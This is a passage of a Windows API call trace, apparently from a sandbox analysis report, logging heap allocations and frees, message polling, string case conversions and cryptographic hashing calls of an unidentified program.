(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.166] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.166] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.166] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0188.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0188.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.167] CryptHashData (hHash=0xaa5920, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0188.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0188.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0188.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0188.175] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.175] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0188.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.176] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.176] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.176] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.177] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.177] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.177] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.177] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.177] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0188.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0188.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0188.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", 